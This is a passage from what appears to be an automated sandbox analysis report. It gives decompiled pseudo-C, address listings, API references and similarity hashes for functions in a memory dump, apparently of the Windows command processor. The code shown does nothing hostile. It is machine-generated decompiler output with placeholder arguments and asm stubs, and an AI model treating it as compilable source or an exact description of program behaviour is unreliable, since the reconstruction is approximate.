                                                    0x011d9399
                                                    0x011d93a2
                                                    0x011d93a4
                                                    0x011d93a9
                                                    0x011d93af
                                                    0x011d93af
                                                    0x011d93a9
                                                    0x011d92a0
                                                    0x011d92a3
                                                    0x011d92a6
                                                    0x011d92a8
                                                    0x011d92a8
                                                    0x011d92b0
                                                    0x011d92b0
                                                    0x011d92b3
                                                    0x011d92b6
                                                    0x011d92c1
                                                    0x011d934d
                                                    0x011d934f
                                                    0x011d934f
                                                    0x011d9352
                                                    0x011d9352
                                                    0x011d9355
                                                    0x011d9358
                                                    0x00000000
                                                    0x011d9352
                                                    0x00000000
                                                    0x011d92c1
                                                    0x011d9251
                                                    0x011d9253
                                                    0x011d9253
                                                    0x011d9256
                                                    0x011d9256
                                                    0x011d9259
                                                    0x011d925c
                                                    0x011d9267
                                                    0x011d93d4
                                                    0x011d93d6
                                                    0x011d93d6
                                                    0x011d93e0
                                                    0x011d93e0
                                                    0x011d93e3
                                                    0x011d93e6
                                                    0x011d93ed
                                                    0x011d93ed
                                                    0x00000000
                                                    0x011d9267
                                                    0x011d9247
                                                    0x00000000
                                                    0x011d9247
                                                    0x011d9211
                                                    0x011d9213
                                                    0x011d9213
                                                    0x011d9216
                                                    0x011d9216
                                                    0x011d9219
                                                    0x011d921c
                                                    0x011d9225
                                                    0x011d9227
                                                    0x00000000
                                                    0x011d9227
                                                    0x011d9114
                                                    0x011f090a
                                                    0x011f090d
                                                    0x011f0910
                                                    0x011d911a
                                                    0x011d911a
                                                    0x011d911a
                                                    0x011d9121
                                                    0x011d9123
                                                    0x011d9126
                                                    0x011d9128
                                                    0x011d9128
                                                    0x011d912e
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9135
                                                    0x011d9138
                                                    0x011d913b
                                                    0x011d913b
                                                    0x011d9143
                                                    0x011f091c
                                                    0x011f091c
                                                    0x00000000
                                                    0x011f091c
                                                    0x011d914b
                                                    0x011d914d
                                                    0x011d914f
                                                    0x011f0924
                                                    0x011f0929
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0933
                                                    0x011f0938
                                                    0x011f093e
                                                    0x011f0944
                                                    0x011f0944
                                                    0x011f0948
                                                    0x011f0960
                                                    0x00000000
                                                    0x011f0960
                                                    0x011d9155
                                                    0x011d9158
                                                    0x011d915a
                                                    0x011d915d
                                                    0x011d915d
                                                    0x011d915f
                                                    0x011d9162
                                                    0x011d9168
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9170
                                                    0x011d9170
                                                    0x011d9179
                                                    0x011d917c
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9182
                                                    0x011d9185
                                                    0x011d918c
                                                    0x011d9194
                                                    0x011d919a
                                                    0x00000000
                                                    0x00000000
                                                    0x011d91a2
                                                    0x011d91a7
                                                    0x011d91ac
                                                    0x011d91af
                                                    0x011d91b2
                                                    0x011d91b2
                                                    0x011d91b7
                                                    0x011d91bd
                                                    0x011d91c2
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9322
                                                    0x011d9325
                                                    0x011d9326
                                                    0x011d932d
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9334
                                                    0x011d9339
                                                    0x011d933f
                                                    0x011d9342
                                                    0x011d9345
                                                    0x011d9345
                                                    0x011d91c8
                                                    0x011d91cb
                                                    0x011d91ce
                                                    0x011d91d1
                                                    0x011d91d4
                                                    0x011d91d7
                                                    0x011d91dd
                                                    0x00000000
                                                    0x00000000
                                                    0x011d91df
                                                    0x00000000
                                                    0x011d91df
                                                    0x011d90fc
                                                    0x011d90bf
                                                    0x011d90c9
                                                    0x011d90cb
                                                    0x011d90cd
                                                    0x011d90d0
                                                    0x00000000
                                                    0x011d90d0
                                                    0x011d8fd3
                                                    0x011d8fd5
                                                    0x011d8fd8
                                                    0x011d8fda
                                                    0x011d8fe0
                                                    0x011d8fe0
                                                    0x011d8fe6
                                                    0x00000000
                                                    0x00000000
                                                    0x011d8fe8
                                                    0x011d8fef
                                                    0x00000000
                                                    0x011d8ffa
                                                    0x011d8ffa
                                                    0x011d8ffa
                                                    0x011d8ffd
                                                    0x011d9000
                                                    0x00000000
                                                    0x011d9000
                                                    0x011d8fef
                                                    0x011d900e
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9014
                                                    0x011d9019
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9023
                                                    0x011d902c
                                                    0x011d902e
                                                    0x011d9033
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9039
                                                    0x011d9039
                                                    0x011d903e
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9046
                                                    0x011f08dd
                                                    0x00000000
                                                    0x00000000
                                                    0x011f08e3
                                                    0x011f08e5
                                                    0x00000000
                                                    0x011f08e5
                                                    0x011d9051
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9057
                                                    0x011d9059
                                                    0x011d905b
                                                    0x011d905d
                                                    0x011d905d
                                                    0x011d9060
                                                    0x011d9063
                                                    0x011d9066
                                                    0x011d9069
                                                    0x011d906e
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9076
                                                    0x011d908e
                                                    0x011d9090
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9090
                                                    0x011d9078
                                                    0x011d907e
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9080
                                                    0x011d9083
                                                    0x011d9086
                                                    0x011d9089
                                                    0x011d908a
                                                    0x011d908b
                                                    0x011d908b
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • _wcsnicmp.MSVCRT ref: 011D91B7
                                                    • wcstol.MSVCRT ref: 011D91FC
                                                    • wcstol.MSVCRT ref: 011D928A
                                                    • longjmp.MSVCRT(?,000000FF,1805BC26,-00000002,?,00000000), ref: 011F08B2
                                                    • longjmp.MSVCRT(?,000000FF), ref: 011F08C6
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                                    • String ID:
                                                    • API String ID: 2863075230-0
                                                    • Opcode ID: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                                    • Instruction ID: 8a321189e41723879131518aa523104b78af93cb225adccae0a9bc184099677d
                                                    • Opcode Fuzzy Hash: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                                    • Instruction Fuzzy Hash: 8CF1E175D0020A9BDF2CCFA8C4846FEBBB5BF88708F19421DD916A7384EB715901CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E4F66, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E011E4F66(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				WCHAR* _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				char _v1076;
				void _v1084;
				void* _v1096;
				int _v1100;
				WCHAR* _v1104;
				WCHAR* _v1108;
				char _v1112;
				WCHAR* _v1116;
				int _v1120;
				void* _v1124;
				intOrPtr _v1128;
				void* _v1138;
				int _v1142;
				int _v1146;
				int _v1150;
				int _v1154;
				int _v1158;
				int _v1162;
				int _v1166;
				int _v1170;
				short _v1172;
				int _v1176;
				WCHAR* _v1180;
				int _v1184;
				char _v1188;
				int _v1192;
				int _v1196;
				intOrPtr _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				WCHAR* _t97;
				signed int _t101;
				char _t112;
				void* _t113;
				void* _t135;
				void* _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;

				_t130 = __edx;
				_t143 = (_t141 & 0xfffffff8) - 0x4ac;
				_t78 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t78 ^ _t143;
				_v1200 = __ecx;
				_v1180 = 0;
				_v1172 = 0;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = 0;
				_t112 = 1;
				_v1184 = 0;
				_v1176 = 0;
				_v1170 = 0;
				_v1166 = 0;
				_v1162 = 0;
				_v1158 = 0;
				_v1154 = 0;
				_v1150 = 0;
				_v1146 = 0;
				_v1142 = 0;
				asm("stosd");
				_v564 = 0;
				asm("stosd");
				_v560 = 1;
				_v556 = 0x104;
				asm("stosd");
				asm("stosw");
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1104 = 0;
				_v1100 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				memset( &_v1084, 0, 0x104);
				_t144 = _t143 + 0xc;
				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L14:
					__imp__??_V@YAXPAX@Z(_v564);
					_pop(_t135);
					_pop(_t139);
					_pop(_t113);
					return E011E6FD0(_t112, _t113, _v8 ^ _t144, _t130, _t135, _t139);
				}
				_t140 =  *0x1213cd8;
				_v1192 = 6;
				_v20 = 0x104;
				_v1188 = 0;
				_v1196 = 0x8000;
				_v1124 = 0;
				_v1104 = 0;
				_v28 = 0;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_t144 = _t144 + 0xc;
				if(E011E0C70( &_v548, GetEnvironmentVariableW(L"DIRCMD", 0, 0)) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					goto L14;
				}
				_t97 = _v28;
				if(_t97 == 0) {
					_t97 =  &_v548;
				}
				if(GetEnvironmentVariableW(L"DIRCMD", _t97, _v20) != 0) {
					_t122 = _v28;
					if(_v28 == 0) {
						_t122 =  &_v548;
					}
					if(E011DCB48( &_v1196) == _t112) {
						_push(0);
						_push(0x2377);
						E011DC5A2(_t122);
					}
				}
				_t130 =  &_v1196;
				if(E011DCB48( &_v1196) != _t112) {
					_t101 = _v1196;
					if((_t101 & 0x00000040) != 0) {
						_t101 = _t101 & 0xfffb79fb;
						_v1196 = _t101;
					}
					if((_t101 & 0x00000400) != 0) {
						_v1196 = _t101 & 0xfffffdbb;
					}
					_t124 = _v564;
					if(_v564 == 0) {
						_t124 =  &_v1084;
					}
					_t130 = _v556;
					E011E36CB(_t112, _t124, _v556, 0);
					if(_v1128 == 0) {
						_t125 = _v564;
						_v1124 = _t112;
						if(_v564 == 0) {
							_t125 =  &_v1084;
						}
						_v1120 = E011E297B(_t125);
						_v1112 = _t112;
						_v1116 = 0;
						_v1108 = 0;
					}
					_t112 = E011E2DD2( &_v1188, _t130);
					_t106 = _v556;
					if(_v556 == 0) {
						_t106 =  &_v1076;
					}
					E011E0BFC(_t106, _v548);
					E011E2A06(_t140, 0);
				}
				goto L13;
			}






















































                                                    0x011e4f66
                                                    0x011e4f6e
                                                    0x011e4f74
                                                    0x011e4f7b
                                                    0x011e4f85
                                                    0x011e4f8b
                                                    0x011e4f8f
                                                    0x011e4f98
                                                    0x011e4fa0
                                                    0x011e4fa9
                                                    0x011e4fad
                                                    0x011e4fae
                                                    0x011e4fb2
                                                    0x011e4fb6
                                                    0x011e4fba
                                                    0x011e4fbe
                                                    0x011e4fc2
                                                    0x011e4fc6
                                                    0x011e4fca
                                                    0x011e4fce
                                                    0x011e4fd2
                                                    0x011e4fd6
                                                    0x011e4fd9
                                                    0x011e4fe0
                                                    0x011e4fe1
                                                    0x011e4fe8
                                                    0x011e4fef
                                                    0x011e4ff0
                                                    0x011e4ff4
                                                    0x011e4ffc
                                                    0x011e5000
                                                    0x011e5004
                                                    0x011e5008
                                                    0x011e500c
                                                    0x011e5010
                                                    0x011e5014
                                                    0x011e5015
                                                    0x011e5016
                                                    0x011e501f
                                                    0x011e502d
                                                    0x011e504a
                                                    0x011e5176
                                                    0x011e517d
                                                    0x011e518d
                                                    0x011e518e
                                                    0x011e518f
                                                    0x011e519a
                                                    0x011e519a
                                                    0x011e5050
                                                    0x011e505d
                                                    0x011e5066
                                                    0x011e5076
                                                    0x011e507a
                                                    0x011e5082
                                                    0x011e5086
                                                    0x011e508a
                                                    0x011e5091
                                                    0x011e5098
                                                    0x011e509d
                                                    0x011e50bc
                                                    0x011e5168
                                                    0x011e516f
                                                    0x00000000
                                                    0x011e5175
                                                    0x011e50c2
                                                    0x011e50cb
                                                    0x011e50cd
                                                    0x011e50cd
                                                    0x011e50e9
                                                    0x011ef084
                                                    0x011ef08d
                                                    0x011ef08f
                                                    0x011ef08f
                                                    0x011ef0a1
                                                    0x011ef0a7
                                                    0x011ef0a8
                                                    0x011ef0ad
                                                    0x011ef0b3
                                                    0x011ef0a1
                                                    0x011e50f3
                                                    0x011e50fe
                                                    0x011e5100
                                                    0x011e5106
                                                    0x011e5108
                                                    0x011e510d
                                                    0x011e510d
                                                    0x011e5116
                                                    0x011ef0be
                                                    0x011ef0be
                                                    0x011e511c
                                                    0x011e5125
                                                    0x011e519b
                                                    0x011e519b
                                                    0x011e5127
                                                    0x011e512f
                                                    0x011e5138
                                                    0x011ef0c7
                                                    0x011ef0ce
                                                    0x011ef0d4
                                                    0x011ef0d6
                                                    0x011ef0d6
                                                    0x011ef0e2
                                                    0x011ef0e6
                                                    0x011ef0ea
                                                    0x011ef0ee
                                                    0x011ef0ee
                                                    0x011e5147
                                                    0x011e5149
                                                    0x011e5152
                                                    0x011e51a4
                                                    0x011e51a4
                                                    0x011e515c
                                                    0x011e5163
                                                    0x011e5163
                                                    0x00000000

                                                    APIs
                                                    • memset.MSVCRT ref: 011E501F
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • memset.MSVCRT ref: 011E5098
                                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50A7
                                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50E1
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E516F
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E517D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$EnvironmentVariable
                                                    • String ID: DIRCMD
                                                    • API String ID: 1405722092-1465291664
                                                    • Opcode ID: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                                    • Instruction ID: 9df05a81d3d1e3ea09cbe4502f8e4b083b1439eed2b9887544558e7936430aac
                                                    • Opcode Fuzzy Hash: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                                    • Instruction Fuzzy Hash: 7E7139B160CB829FD768CFA9D88869BBBE5BFD4308F04492EF59983250DB309544CB57
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F196F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E011F196F(void** __ecx, intOrPtr _a4, signed int _a12, signed int _a16) {
				void* _v0;
				signed int _v8;
				char _v532;
				void** _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short* _t26;
				void* _t29;
				void* _t31;
				signed int* _t38;
				void** _t40;
				long _t41;
				signed int _t42;
				signed int _t47;
				char* _t48;
				void* _t55;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				void* _t64;
				signed int _t65;

				_t20 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t20 ^ _t65;
				_t59 = _a12;
				_t40 = __ecx;
				_v536 = __ecx;
				_t24 = _t59 & 0x80000000 | _a16;
				if((_t59 & 0x80000000 | _a16) != 0) {
					E011E80F2(_t24);
				}
				E011E1040( &_v532, 0x104, _a4);
				_t57 = 0x104;
				_t26 =  &_v532;
				while( *_t26 != 0) {
					_t26 = _t26 + 2;
					_t57 = _t57 - 1;
					if(_t57 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t47 =  ~_t57 & 0x00000104 - _t57;
				if(_t57 != 0) {
					_t38 =  &_v532 + _t47 * 2;
					_t64 = 0x104 - _t47;
					if(_t64 == 0) {
						L14:
						_t38 = _t38 - 2;
					} else {
						_t55 = 0x7ffffffe;
						_t57 = L"_p0" - _t38;
						while(_t55 != 0) {
							_t42 =  *(_t38 + _t57) & 0x0000ffff;
							if(_t42 == 0) {
								break;
							} else {
								 *_t38 = _t42;
								_t55 = _t55 - 1;
								_t38 =  &(_t38[0]);
								_t64 = _t64 - 1;
								if(_t64 != 0) {
									continue;
								} else {
									L13:
									_t40 = _v536;
									goto L14;
								}
							}
							goto L16;
						}
						if(_t64 != 0) {
							_t40 = _v536;
						} else {
							goto L13;
						}
					}
					L16:
					 *_t38 = 0;
				}
				_t60 = _t59 & 0x7fffffff;
				_t29 = _t60;
				if(_t60 <= 0) {
					_t29 = 1;
				}
				_t48 =  &_v532;
				__imp__CreateSemaphoreExW(0, _t60, _t29, _t48, 0, 0x1f0003);
				_t61 = _t29;
				if(_t61 == 0) {
					_t57 = 0x1621;
					_t63 = E011F2913("internal\\sdk\\inc\\wil\\ResultMacros.h");
					if(_t63 >= 0) {
						goto L25;
					} else {
						_t57 = 0x84;
						E011F292C("wil", _t63);
						_t31 = _t63;
					}
				} else {
					_t63 =  *_t40;
					if(_t63 != 0) {
						_t41 = GetLastError();
						if(CloseHandle(_t63) == 0) {
							_push(_t48);
							_t57 = 0x879;
							E011F2D56();
						}
						SetLastError(_t41);
						_t40 = _v536;
					}
					 *_t40 = _t61;
					L25:
					_t31 = 0;
				}
				return E011E6FD0(_t31, _t40, _v8 ^ _t65, _t57, _t61, _t63);
			}




























                                                    0x011f197a
                                                    0x011f1981
                                                    0x011f1987
                                                    0x011f198a
                                                    0x011f198e
                                                    0x011f1999
                                                    0x011f199c
                                                    0x011f199e
                                                    0x011f199e
                                                    0x011f19b3
                                                    0x011f19b8
                                                    0x011f19ba
                                                    0x011f19c0
                                                    0x011f19c6
                                                    0x011f19c9
                                                    0x011f19cc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f19cc
                                                    0x011f19d6
                                                    0x011f19d8
                                                    0x011f19dc
                                                    0x011f19e4
                                                    0x011f19e7
                                                    0x011f19e9
                                                    0x011f1a1c
                                                    0x011f1a1c
                                                    0x011f19eb
                                                    0x011f19f0
                                                    0x011f19f5
                                                    0x011f19f7
                                                    0x011f19fb
                                                    0x011f1a02
                                                    0x00000000
                                                    0x011f1a04
                                                    0x011f1a04
                                                    0x011f1a07
                                                    0x011f1a08
                                                    0x011f1a0b
                                                    0x011f1a0e
                                                    0x00000000
                                                    0x011f1a10
                                                    0x011f1a16
                                                    0x011f1a16
                                                    0x00000000
                                                    0x011f1a16
                                                    0x011f1a0e
                                                    0x00000000
                                                    0x011f1a02
                                                    0x011f1a14
                                                    0x011f1a21
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f1a14
                                                    0x011f1a27
                                                    0x011f1a29
                                                    0x011f1a29
                                                    0x011f1a2c
                                                    0x011f1a32
                                                    0x011f1a34
                                                    0x011f1a36
                                                    0x011f1a36
                                                    0x011f1a42
                                                    0x011f1a4d
                                                    0x011f1a53
                                                    0x011f1a57
                                                    0x011f1aa7
                                                    0x011f1ab6
                                                    0x011f1aba
                                                    0x00000000
                                                    0x011f1abc
                                                    0x011f1abf
                                                    0x011f1aca
                                                    0x011f1acf
                                                    0x011f1acf
                                                    0x011f1a59
                                                    0x011f1a59
                                                    0x011f1a5d
                                                    0x011f1a66
                                                    0x011f1a70
                                                    0x011f1a72
                                                    0x011f1a76
                                                    0x011f1a7b
                                                    0x011f1a7b
                                                    0x011f1a81
                                                    0x011f1a87
                                                    0x011f1a87
                                                    0x011f1a8d
                                                    0x011f1a8f
                                                    0x011f1a8f
                                                    0x011f1a8f
                                                    0x011f1aa1

                                                    APIs
                                                    • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 011F1A4D
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F1A5F
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 011F1A68
                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1A81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorLast$CloseCreateHandleSemaphore
                                                    • String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
                                                    • API String ID: 2276426104-46676964
                                                    • Opcode ID: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                                    • Instruction ID: f9ea3adfe148da17dcd83e22b9dbe5fc151c1b47d0200f660f2caf3e00ac0daf
                                                    • Opcode Fuzzy Hash: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                                    • Instruction Fuzzy Hash: 91412332B4016AEBDB2DDE28C958BAA37E5FF94310F15416CEA05E7284DB70CD04CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D6785, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011D6785(signed short** __ecx, signed short** __edx, void* __eflags, signed short** _a4) {
				signed short* _t8;
				signed short _t9;
				long _t13;
				signed short** _t18;
				signed short _t25;
				long _t32;
				wchar_t* _t33;
				signed short** _t34;

				_t18 = __edx;
				_t34 = __ecx;
				E011D9794(__ecx);
				_t32 =  *( *_t34) & 0x0000ffff;
				if(_t32 == 0 || iswdigit(_t32) != 0 || wcschr(L"<>+-*/%()|^&=,", _t32) != 0) {
					L12:
					return 0;
				} else {
					_t33 = L"+-~!";
					if(wcschr(_t33, _t32) != 0) {
						goto L12;
					}
					_t8 =  *_t34;
					 *_t18 = _t8;
					while(1) {
						_t9 =  *_t8 & 0x0000ffff;
						_t25 = _t9;
						if(_t9 == 0) {
							break;
						}
						_t13 = _t25 & 0x0000ffff;
						if(_t13 <= 0x20 || wcschr(_t33, _t13) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t34) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t34 =  &(( *_t34)[1]);
							_t8 =  *_t34;
							continue;
						}
					}
					 *_a4 =  *_t34;
					return 1;
				}
			}











                                                    0x011d678d
                                                    0x011d678f
                                                    0x011d6791
                                                    0x011d6798
                                                    0x011d679e
                                                    0x011d6828
                                                    0x00000000
                                                    0x011d67c2
                                                    0x011d67c3
                                                    0x011d67d3
                                                    0x00000000
                                                    0x00000000
                                                    0x011d67d5
                                                    0x011d67d7
                                                    0x011d67d9
                                                    0x011d67d9
                                                    0x011d67dc
                                                    0x011d67e1
                                                    0x00000000
                                                    0x00000000
                                                    0x011d67e3
                                                    0x011d67e9
                                                    0x00000000
                                                    0x011d6810
                                                    0x011d6810
                                                    0x011d6813
                                                    0x00000000
                                                    0x011d6813
                                                    0x011d67e9
                                                    0x011d681c
                                                    0x00000000
                                                    0x011d6820

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: wcschr$iswdigit
                                                    • String ID: +-~!$<>+-*/%()|^&=,
                                                    • API String ID: 2770779731-632268628
                                                    • Opcode ID: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                                    • Instruction ID: 0d3cac2b9771f7124005ed13b5228e74fb370cb20230452fd0d6071d9c53e047
                                                    • Opcode Fuzzy Hash: b799eddfbb1f0417292e687751c4a38237a04b623e496bf669328b718f11489d
                                                    • Instruction Fuzzy Hash: E61194B6604302EF9B2C9B1EE85997677E8EFAA675320042EF581C7581FF21D800C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DB610, Relevance: 12.2, APIs: 8, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E011DB610(void* __ebx, void** __ecx, void* __edi) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				void* _t37;
				intOrPtr _t39;
				void* _t40;
				void* _t52;
				long _t55;
				long _t56;
				void* _t57;
				long _t61;
				void* _t66;
				long _t73;
				void* _t85;
				void* _t87;
				void** _t101;
				long _t104;

				_t101 = __ecx;
				_t37 = E011E269C(E011DB6B9(__ecx));
				_t104 = _t101[4];
				if(_t37 != 0) {
					_t39 = _t104 + _t101[2] * 2;
					_v12 = _t39;
					__eflags = _t104 - _t39;
					if(_t104 < _t39) {
						_t85 = 0x2022;
						while(1) {
							_t73 = _t104;
							__eflags = _t104 - _t39;
							if(_t104 >= _t39) {
								goto L3;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								__eflags =  *_t73 - _t85;
								if( *_t73 == _t85) {
									break;
								}
								_t73 = 2 + _t73;
								__eflags = _t73 - _t39;
								if(_t73 < _t39) {
									continue;
								}
								break;
							}
							__eflags = _t73 - _t104;
							if(_t73 == _t104) {
								goto L20;
							} else {
								_t66 = _t73 - _t104 >> 1;
								_v16 = _t66;
								__imp___get_osfhandle(0);
								_t54 = WriteConsoleW(_t66, 1, _t104, _t66,  &_v8);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L30;
								} else {
									_t54 = _v16;
									__eflags = _v8 - _v16;
									if(_v8 != _v16) {
										goto L30;
									} else {
										_t39 = _v12;
										_t104 = _t73;
										_t85 = 0x2022;
										while(1) {
											L20:
											__eflags = _t73 - _t39;
											if(_t73 >= _t39) {
												break;
											}
											__eflags =  *_t73 - _t85;
											if( *_t73 == _t85) {
												_t73 = 2 + _t73;
												__eflags = _t73;
												continue;
											}
											break;
										}
										__eflags = _t73 - _t104;
										if(_t73 == _t104) {
											L27:
											_t85 = 0x2022;
											__eflags = _t104 - _t39;
											if(_t104 < _t39) {
												continue;
											} else {
												goto L3;
											}
										} else {
											__eflags =  *_t101;
											if( *_t101 != 0) {
												SetConsoleMode( *_t101, 2);
											}
											_t52 = _t73 - _t104 >> 1;
											_v16 = _t52;
											__imp___get_osfhandle(_t104, _t52,  &_v8, 0);
											_t87 = 1;
											_t104 = WriteConsoleW(_t52, ??, ??, ??, ??);
											_t54 = E011E06C0(_t87);
											__eflags = _t104;
											if(_t104 == 0) {
												goto L30;
											} else {
												_t54 = _v16;
												__eflags = _v8 - _v16;
												if(_v8 != _v16) {
													goto L30;
												} else {
													_t39 = _v12;
													_t104 = _t73;
													goto L27;
												}
											}
										}
									}
								}
							}
							goto L38;
						}
					}
					goto L3;
				} else {
					if(E011E27C8(_t101[2] + _t101[2], _t104, _t101[2] + _t101[2],  &_v8) == 0) {
						L30:
						_t89 = 1;
						_t55 = E011E0178(_t54);
						__eflags = _t55;
						if(_t55 == 0) {
							_t89 = 1;
							_t56 = E011F9953(_t55, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								_push(_t56);
								_push(0x70);
								goto L34;
							}
						} else {
							_push(0);
							_push(0x1d);
							L34:
							E011DC5A2(_t89);
							_pop(_t89);
						}
						_t57 = E011F9287(_t89);
						__imp__longjmp(0x120b8b8, 1);
						asm("int3");
						__eflags =  *(_t104 + 4) - _t57;
						if(__eflags < 0) {
							return _t57;
						} else {
							E011F3BB0(__eflags, 0);
							 *(_t104 + 4) =  *(_t104 + 4) & 0x00000000;
							E011E4F29(_t104);
							_t61 =  *((intOrPtr*)(_t104 + 0x1c)) - 1;
							__eflags = _t61;
							 *(_t104 + 0x24) = _t61;
							return _t61;
						}
					} else {
						_t70 = _t101[2];
						_t54 = _t101[2] + _t70;
						if(_v8 != _t101[2] + _t70) {
							goto L30;
						} else {
							L3:
							_t40 = E011E269C(_t39);
							if(_t40 != 0) {
								__imp___get_osfhandle(0);
								WriteConsoleW( &_v8, 1, L"\r\n", 2,  &_v8);
							} else {
								E011E27C8( &_v8, L"\r\n", 4,  &_v8);
							}
